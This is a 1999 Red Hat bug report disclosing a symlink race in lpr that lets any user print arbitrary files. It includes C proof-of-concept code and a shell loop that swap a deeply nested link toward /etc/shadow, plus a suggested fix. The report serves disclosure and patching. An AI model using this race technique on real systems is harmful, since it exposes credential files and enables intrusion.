Bug 5903
| Summary: | race condition allows a user to read any file | ||
|---|---|---|---|
| Product: | [Retired] Red Hat Linux | Reporter: | tymm |
| Component: | lpr | Assignee: | Bill Nottingham <notting> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | ||
| Version: | 6.0 | CC: | rvokal |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 1999-10-18 03:20:42 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
Fixed in the lpr errata release. |
time between the check between whether a file is accessable or not and copying of the data in lpr allows a user to use a symlink race exploit to print any file desired. Tested by creating a deeply nested directory (I used 256 levels) and having a program change a link there between /etc/shadow and a readable file, and then doing a while(1) loop running lpr; after about 3-4 minutes on a P90, /etc/shadow appeared in the print spool. crud-level test code: int main() char *file = "/tmp/0/1/2/3/4/5/6/7/8/9/10/11/12/13/14/15/16/17/18/19/20/21/22/23/24/25/26/27/28/29/30/31/32/33/34/35/36/37/38/39/40/41/42/43/44/45/46/47/48/49/50/51/52/53/54/55/56/57/58/59/60/61/62/63/64/65/66/67/68/69/70/71/72/73/74/75/76/77/78/79/80/81/82/83/84/85/86/87/88/89/90/91/92/93/94/95/96/97/98/99/100/101/102/103/104/105/106/107/108/109/110/111/112/113/114/115/116/117/118/119/120/121/122/123/124/125/126/127/128/129/130/131/132/133/134/135/136/137/138/139/140/141/142/143/144/145/146/147/148/149/150/151/152/153/154/155/156/157/158/159/160/161/162/163/164/165/166/167/168/169/170/171/172/173/174/175/176/177/178/179/180/181/182/183/184/185/186/187/188/189/190/191/192/193/194/195/196/197/198/199/200/201/202/203/204/205/206/207/208/209/210/211/212/213/214/215/216/217/218/219/220/221/222/223/224/225/226/227/228/229/230/231/232/233/234/235/236/237/238/239/240/241/242/243/244/245/246/247/248/249/250/251/252/253/254/255/x"; while (1) { symlink("/tmp/test", file); unlink(file); symlink("/etc/shadow", file); unlink(file); } } where /tmp/test is a user-readable file... used while true; do lpr /tmp/0.../255/x; done loop for the other half. suggested fix: use setfsuid() or seteuid() around points where files are opened for reading.